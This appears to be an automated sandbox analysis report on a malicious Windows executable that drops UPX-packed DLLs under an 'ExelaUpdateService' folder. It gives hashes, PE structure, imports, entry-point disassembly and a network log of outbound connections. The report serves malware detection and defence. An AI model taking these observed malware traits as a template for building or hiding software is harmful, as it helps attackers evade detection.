                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........<T.S]:.S]:.S]:.Z%.._]:..&;.Q]:..&?.^]:..&>.[]:..&9.W]:../;.P]:.S];..]:..&2.R]:..&:.R]:..&.R]:..&8.R]:.RichS]:.........................PE..d.....Vc.........." ...!.0...0...............................................0............`.............................................L"......................\...........`-..........................................@...........................................UPX0....................................UPX1.....0.......&..................@....rsrc....0...........*..............@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):300920
                                                                                                                                                                                                                                                          Entropy (8bit):7.985723274612961
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6144:12Fuue6iwoBLhgXM5kayIQJCEUcHQdBAFEzz9DxsXcY:12/e6inLOoyVJ/LHQdgipxsMY
                                                                                                                                                                                                                                                          MD5:06A5E52CAF03426218F0C08FC02CC6B8
                                                                                                                                                                                                                                                          SHA1:AE232C63620546716FBB97452D73948EBFD06B35
                                                                                                                                                                                                                                                          SHA-256:118C31FAA930F2849A14C3133DF36420A5832114DF90D77B09CDE0AD5F96F33A
                                                                                                                                                                                                                                                          SHA-512:546B1A01F36D3689B0FDEEDA8B1CE55E7D3451731CA70FFFE6627D542FFF19D7A70E27147CAB1920AAE8BED88272342908D4E9D671D7ABA74ABB5DB398B90718
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........e...l...l...l..|....l.0.m...l.0.i...l.0.h...l.0.o...l.>.m...l.cvm...l...m...l.>.a...l.>.l...l.>.....l.>.n...l.Rich..l.................PE..d...k.Vc.........." ...!.`.......@.. ....P................................................`.............................................X....................P...................................................... ...@...........................................UPX0.....@..............................UPX1.....`...P...\..................@....rsrc................`..............@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):41472
                                                                                                                                                                                                                                                          Entropy (8bit):7.868227278889233
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:dU3TLuhvkAahe3LS0HW7A7I57CdTRgbaa34cU29pU:dCFs7S0HW07I57CBRgkcw
                                                                                                                                                                                                                                                          MD5:9A8F969ECDF0C15734C1D582D2AE35D8
                                                                                                                                                                                                                                                          SHA1:A40691E81982F610A062E49A5AD29CFFB5A2F5A8
                                                                                                                                                                                                                                                          SHA-256:874E52CCEAE9A3C967BAC7B628F4144C32E51FC77F519542FC1BAC19045ECDE8
                                                                                                                                                                                                                                                          SHA-512:E0DEB59ABEF7440F30EFFB1AAB6295B5A50C817F685BE30B21A3C453E3099B97FD71984E6CA6A6C6E0021ABB6E906838566F402B00A11813E67A4E00B119619F
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../]..A...A...A.......A...@...A..@...A...D...A...E...A...B...A.[.@...A...@.B.A..`I...A..`A...A..`....A..`C...A.Rich..A.................PE..d....Ype.........." ...%.........`.......p................................... ............`.............................................d...............................................................................@...........................................UPX0.....`..............................UPX1.........p......................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):32768
                                                                                                                                                                                                                                                          Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                                          MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                                          SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                                          SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                                          SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):32768
                                                                                                                                                                                                                                                          Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                                          MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                                          SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                                          SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                                          SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):55
                                                                                                                                                                                                                                                          Entropy (8bit):4.306461250274409
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                                                                          MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                                                                          SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                                                                          SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                                                                          SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                                                                                                                          File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Entropy (8bit):7.996384436680205
                                                                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                                                                          • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                                                                                                                                                          • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                          File name:SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
                                                                                                                                                                                                                                                          File size:11'317'024 bytes
                                                                                                                                                                                                                                                          MD5:d53e9b9d10affcf90e613abccc702ca2
                                                                                                                                                                                                                                                          SHA1:24849b1a515347a75804d53c483ce6dffc78dbcc
                                                                                                                                                                                                                                                          SHA256:0bcfadb848694ee56bf3fad6c3a9df4fde2d60cd52ce2a16be42b06fda520812
                                                                                                                                                                                                                                                          SHA512:12518c78d05c6bccd7048a80bae141d286dd241bbf55afe6622c36e1e115018c48186a52c5fdb21d6b589461c7a619949d354045e15b5c76a2a09ebfdf392b46
                                                                                                                                                                                                                                                          SSDEEP:196608:0GAYfPA7lz2Jp5UfLuseNvX+wfm/pf+xfdkR7c2WKsnqrIWOIW0DaqkH:LAYg7h2Jp5MivX+9/pWFGR7c2BsnqrID
                                                                                                                                                                                                                                                          TLSH:1DB6335877F009E1FA6735BAD4828860D272FC610B64D78F47A856F62F1BA90487FF48
                                                                                                                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................................-.....................,.............................................................Rich...........
                                                                                                                                                                                                                                                          Icon Hash:90cececece8e8eb0
                                                                                                                                                                                                                                                          Entrypoint:0x14000c330
                                                                                                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                                                                                                          Digitally signed:false
                                                                                                                                                                                                                                                          Imagebase:0x140000000
                                                                                                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                          Time Stamp:0x6628322A [Tue Apr 23 22:11:54 2024 UTC]
                                                                                                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                                                                                                          OS Version Major:5
                                                                                                                                                                                                                                                          OS Version Minor:2
                                                                                                                                                                                                                                                          File Version Major:5
                                                                                                                                                                                                                                                          File Version Minor:2
                                                                                                                                                                                                                                                          Subsystem Version Major:5
                                                                                                                                                                                                                                                          Subsystem Version Minor:2
                                                                                                                                                                                                                                                          Import Hash:1af6c885af093afc55142c2f1761dbe8
                                                                                                                                                                                                                                                          Instruction
                                                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                                                          sub esp, 28h
                                                                                                                                                                                                                                                          call 00007FBF156E68FCh
                                                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                                                          add esp, 28h
                                                                                                                                                                                                                                                          jmp 00007FBF156E651Fh
                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                                                          sub esp, 28h
                                                                                                                                                                                                                                                          call 00007FBF156E6E74h
                                                                                                                                                                                                                                                          test eax, eax
                                                                                                                                                                                                                                                          je 00007FBF156E66C3h
                                                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                                                          mov eax, dword ptr [00000030h]
                                                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                                                          mov ecx, dword ptr [eax+08h]
                                                                                                                                                                                                                                                          jmp 00007FBF156E66A7h
                                                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                                                          cmp ecx, eax
                                                                                                                                                                                                                                                          je 00007FBF156E66B6h
                                                                                                                                                                                                                                                          xor eax, eax
                                                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                                                          cmpxchg dword ptr [000351BCh], ecx
                                                                                                                                                                                                                                                          jne 00007FBF156E6690h
                                                                                                                                                                                                                                                          xor al, al
                                                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                                                          add esp, 28h
                                                                                                                                                                                                                                                          ret
                                                                                                                                                                                                                                                          mov al, 01h
                                                                                                                                                                                                                                                          jmp 00007FBF156E6699h
                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                                                          sub esp, 28h
                                                                                                                                                                                                                                                          test ecx, ecx
                                                                                                                                                                                                                                                          jne 00007FBF156E66A9h
                                                                                                                                                                                                                                                          mov byte ptr [000351A5h], 00000001h
                                                                                                                                                                                                                                                          call 00007FBF156E6C81h
                                                                                                                                                                                                                                                          call 00007FBF156E7288h
                                                                                                                                                                                                                                                          test al, al
                                                                                                                                                                                                                                                          jne 00007FBF156E66A6h
                                                                                                                                                                                                                                                          xor al, al
                                                                                                                                                                                                                                                          jmp 00007FBF156E66B6h
                                                                                                                                                                                                                                                          call 00007FBF156F51EFh
                                                                                                                                                                                                                                                          test al, al
                                                                                                                                                                                                                                                          jne 00007FBF156E66ABh
                                                                                                                                                                                                                                                          xor ecx, ecx
                                                                                                                                                                                                                                                          call 00007FBF156E7298h
                                                                                                                                                                                                                                                          jmp 00007FBF156E668Ch
                                                                                                                                                                                                                                                          mov al, 01h
                                                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                                                          add esp, 28h
                                                                                                                                                                                                                                                          ret
                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                          inc eax
                                                                                                                                                                                                                                                          push ebx
                                                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                                                          sub esp, 20h
                                                                                                                                                                                                                                                          cmp byte ptr [0003516Ch], 00000000h
                                                                                                                                                                                                                                                          mov ebx, ecx
                                                                                                                                                                                                                                                          jne 00007FBF156E6709h
                                                                                                                                                                                                                                                          cmp ecx, 01h
                                                                                                                                                                                                                                                          jnbe 00007FBF156E670Ch
                                                                                                                                                                                                                                                          call 00007FBF156E6DEAh
                                                                                                                                                                                                                                                          test eax, eax
                                                                                                                                                                                                                                                          je 00007FBF156E66CAh
                                                                                                                                                                                                                                                          test ebx, ebx
                                                                                                                                                                                                                                                          jne 00007FBF156E66C6h
                                                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                                                          lea ecx, dword ptr [00035156h]
                                                                                                                                                                                                                                                          call 00007FBF156F4FE2h
                                                                                                                                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x3e0940x78.rdata
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x470000x92c.rsrc
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x430000x2304.pdata
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x480000x758.reloc
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x3b4400x1c.rdata
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x3b3000x140.rdata
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x2c0000x420.rdata
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                          .text0x10000x2adb00x2ae0075d19a4940b1c41e95d0f65f35d07455False0.5456735149416909data6.502519008894634IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                          .rdata0x2c0000x12ebc0x13000519e0b7eb56483a35c4fbd196b4f35d2False0.5153551603618421data5.816328149825536IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                          .data0x3f0000x33b80xe00c77d6acf176d4b487ea671c3fd3a6945False0.13392857142857142firmware 32a2 vdf2d (revision 2569732096) \377\377\377\377 , version 256.0.512, 0 bytes or less, at 0xcd5d20d2 1725235199 bytes , at 0 0 bytes , at 0xffffffff 16777216 bytes1.828047079050098IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                          .pdata0x430000x23040x2400f9c9a5a34be2cb8fd1246f51c7b22c72False0.4797092013888889data5.38202672986895IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                          _RDATA0x460000x1f40x2004ec0234c233e8c5ae54cd80f9630ff86False0.525390625data3.698330622853966IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                          .rsrc0x470000x92c0xa0024b055042a4a23be9547a9d642aeed81False0.424609375data5.139706693526563IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                          .reloc0x480000x7580x800f1d633c1708caf707b59b5e59d6f78b3False0.54443359375data5.24651730799357IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                          RT_VERSION0x470a00x37cdata0.460762331838565
                                                                                                                                                                                                                                                          RT_MANIFEST0x4741c0x50dXML 1.0 document, ASCII text0.4694508894044857
                                                                                                                                                                                                                                                          DLLImport
                                                                                                                                                                                                                                                          USER32.dllCreateWindowExW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
                                                                                                                                                                                                                                                          COMCTL32.dll
                                                                                                                                                                                                                                                          KERNEL32.dllIsValidCodePage, GetStringTypeW, GetFileAttributesExW, HeapReAlloc, FlushFileBuffers, GetCurrentDirectoryW, GetACP, GetOEMCP, GetModuleHandleW, MulDiv, GetLastError, SetDllDirectoryW, GetModuleFileNameW, CreateSymbolicLinkW, GetProcAddress, GetCommandLineW, GetEnvironmentVariableW, GetCPInfo, ExpandEnvironmentStringsW, CreateDirectoryW, GetTempPathW, WaitForSingleObject, Sleep, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LoadLibraryExW, SetConsoleCtrlHandler, FindClose, FindFirstFileExW, CloseHandle, GetCurrentProcess, LocalFree, FormatMessageW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, WriteConsoleW, SetEndOfFile, SetEnvironmentVariableW, RtlUnwindEx, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, CreateFileW, GetDriveTypeW, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, GetFullPathNameW, RemoveDirectoryW, FindNextFileW, SetStdHandle, DeleteFileW, ReadFile, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, CompareStringW, LCMapStringW
                                                                                                                                                                                                                                                          ADVAPI32.dllOpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
                                                                                                                                                                                                                                                          GDI32.dllSelectObject, DeleteObject, CreateFontIndirectW
                                                                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:07.182427883 CEST4974080192.168.2.4208.95.112.1
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:07.341948032 CEST8049740208.95.112.1192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:07.342048883 CEST4974080192.168.2.4208.95.112.1
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:07.347063065 CEST4974080192.168.2.4208.95.112.1
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:07.508085012 CEST8049740208.95.112.1192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:07.512063026 CEST4974080192.168.2.4208.95.112.1
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:07.671652079 CEST8049740208.95.112.1192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:07.671756029 CEST4974080192.168.2.4208.95.112.1
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:18.750966072 CEST49751443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:18.751020908 CEST44349751162.159.128.233192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:18.751216888 CEST49751443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:18.751899958 CEST49751443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:18.751933098 CEST44349751162.159.128.233192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:19.071511984 CEST44349751162.159.128.233192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:19.075305939 CEST49751443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:19.075366020 CEST44349751162.159.128.233192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:19.076903105 CEST44349751162.159.128.233192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:19.077685118 CEST49751443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:19.079044104 CEST49751443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:19.079044104 CEST49751443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:19.079165936 CEST44349751162.159.128.233192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:19.079396963 CEST49751443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:19.079427958 CEST44349751162.159.128.233192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:19.221479893 CEST49751443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:19.530252934 CEST44349751162.159.128.233192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:19.530421972 CEST44349751162.159.128.233192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:19.530623913 CEST49751443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:19.536576033 CEST49751443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:19.536678076 CEST44349751162.159.128.233192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:19.550335884 CEST49753443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:19.550384998 CEST44349753162.159.128.233192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:19.550483942 CEST49753443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:19.551260948 CEST49753443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:19.551275969 CEST44349753162.159.128.233192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:19.862529993 CEST44349753162.159.128.233192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:19.863152981 CEST49753443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:19.863176107 CEST44349753162.159.128.233192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:19.864649057 CEST44349753162.159.128.233192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:19.864712954 CEST49753443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:19.865537882 CEST49753443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:19.865619898 CEST44349753162.159.128.233192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:19.865896940 CEST49753443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:19.865902901 CEST44349753162.159.128.233192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:19.866019964 CEST49753443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:19.908921957 CEST49753443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:19.908931017 CEST44349753162.159.128.233192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:20.326749086 CEST44349753162.159.128.233192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:20.326898098 CEST44349753162.159.128.233192.168.2.4
                                                                                                                                                                                                                                                          Apr 24, 2024 19:24:20.327184916 CEST49753443192.168.2.4162.159.128.233
